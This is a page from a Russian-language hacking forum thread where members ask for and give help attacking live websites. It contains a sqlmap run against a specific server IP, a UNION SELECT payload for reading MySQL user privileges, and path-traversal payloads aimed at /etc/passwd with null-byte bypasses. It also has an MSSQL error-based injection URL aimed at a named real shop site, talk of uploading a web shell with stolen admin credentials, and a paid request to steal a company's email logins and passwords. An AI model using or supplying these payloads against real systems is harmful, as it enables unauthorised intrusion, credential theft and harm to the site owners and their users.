Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,654
    Likes Received:
    173
    Reputations:
    75
    меня интересует именно мой вопрос
     
  2. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Вызов функций в limit'е ? lol
     
  3. Massay

    Massay New Member

    Joined:
    6 Mar 2013
    Messages:
    24
    Likes Received:
    1
    Reputations:
    0
    Привет всем, есть инъекция вида
    Как можно автоматизировать подбор limit. И как можно узнать другие базы данных, не information_schema.
     
  4. Massay

    Massay New Member

    Joined:
    6 Mar 2013
    Messages:
    24
    Likes Received:
    1
    Reputations:
    0
    Спасибо большое. Скажите ищо пожалуйста где можно по подробнее прочитать про этот тип инъекций.
    Нужно автоматизировать замену и парсинг limit 1,1 ; limit 2,1 ; limit 3,1 для доставания таблиц и баз автоматически.
    Или можно что-то сделать с sqlmap?
     
    #22904 Massay, 5 Jan 2014
    Last edited: 5 Jan 2014
  5. Massay

    Massay New Member

    Joined:
    6 Mar 2013
    Messages:
    24
    Likes Received:
    1
    Reputations:
    0
    Так что, мне никто не поможет
     
  6. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    490
    Likes Received:
    168
    Reputations:
    126
    Фильтруется table_name . Что сделать можно?

     
    _________________________
  7. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    410
    Likes Received:
    40
    Reputations:
    23
    подзапросы используй

    chapters,flags,lands,menu,menu_out,roots,screens,sites,stat,val,words
     
    1 person likes this.
  8. verda

    verda New Member

    Joined:
    10 Mar 2013
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Просканировал с помощью sqlmap один игровой сервер
    sqlmap --url="http://95.163.86.72/cgi-bin/webstrk.exe/strike?t=1" --data="position=0&tmpid=01234567890234567890"

    в логе написало:
    ......
    [16:45:33] [INFO] POST parameter 'position' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
    [16:45:44] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'Microsoft Access'
    .....
    [16:51:10] [WARNING] POST parameter 'position' is not injectable
    [16:51:10] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')
    .....
    Тестировал несколько раз.
    Просмотрев лог запросов увидел что срабатывало на

    position=-6458' OR (3053=8541)
    position=0%22%29%20AND%206045%3D4434%20AND%20%28%22sLat%22%3D%22sLat
    position=0%20AND%205338%3D7364

    Вручную перебирал - ничего толкового не выходило (ошибки так таковой нету).
    Вопрос - Есть ли вообще инъекция и какая база данных? (Microsoft Access :confused: или нет?)
     
  9. Always

    Always New Member

    Joined:
    8 Feb 2012
    Messages:
    72
    Likes Received:
    3
    Reputations:
    0
    +UnIon+selECt+group_concat(user,0x3a,file_priv),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+mysql.user
    не выводит: Y, N
    В чем ошибка? Как узнать права?!
     
  10. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,709
    Likes Received:
    405
    Reputations:
    196
    Если даже нет прав на mysql.user, то и File_priv подавно не будет.
     
    1 person likes this.
  11. Always

    Always New Member

    Joined:
    8 Feb 2012
    Messages:
    72
    Likes Received:
    3
    Reputations:
    0
    есть!
     
  12. x.Com

    x.Com New Member

    Joined:
    3 Sep 2010
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    бандиты подскажите плз
    короче не могу залить шелл, пас и логин от админки есть, но админку найти не могу (
    короче беда, подскажите че придумать можно?
     
  13. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,139
    Reputations:
    886
    ищи админку
     
    _________________________
  14. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    561
    Likes Received:
    159
    Reputations:
    324
    как крутить подобное ?


    Code:
    Failed to load: index/page_../../../../../../../../../etc/passwd.txt
     
  15. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6
    /etc/passwd%00 или /etc/passwd[////4096////]
     
  16. x.Com

    x.Com New Member

    Joined:
    3 Sep 2010
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    дык найти не могу, второй день сижу уже, все перепробывал
     
  17. Xvir

    Xvir New Member

    Joined:
    8 Feb 2011
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Ребята помогите раскрутить mssql не как не доходит!
    http://www.ekb.spk.ru/spkekb/shop/prod_detail/_t_/prod=krug_nerzhaveyuschii
     
  18. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    490
    Likes Received:
    168
    Reputations:
    126
    http://www.ekb.spk.ru/spkekb/shop/order.asp/_t_/prod=krug_nerzhaveyuschii'+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('PrValues','SAP_Param5'))--
     
    _________________________
    #22918 kingbeef, 8 Jan 2014
    Last edited: 8 Jan 2014
    2 people like this.
  19. Xvir

    Xvir New Member

    Joined:
    8 Feb 2011
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Друзья у кого нибудь есть желание за возногрождение поработать на этим сайтом tehkomplekt-ural.ru а именно мне нужно все логины и пассы почты их если что пишите в личку
     
  20. Massay

    Massay New Member

    Joined:
    6 Mar 2013
    Messages:
    24
    Likes Received:
    1
    Reputations:
    0
    Привет всем!)
    Помогите пожалуйста докрутить инъекцию, есть она у меня такого вида "
    "
    Нужный мне хеш она выводит, но не полностью, а только до 32 символов. Как можно обойти это ограничение, и есть ли какое-то готовое решение?
     
Loading...
Thread Status:
Not open for further replies.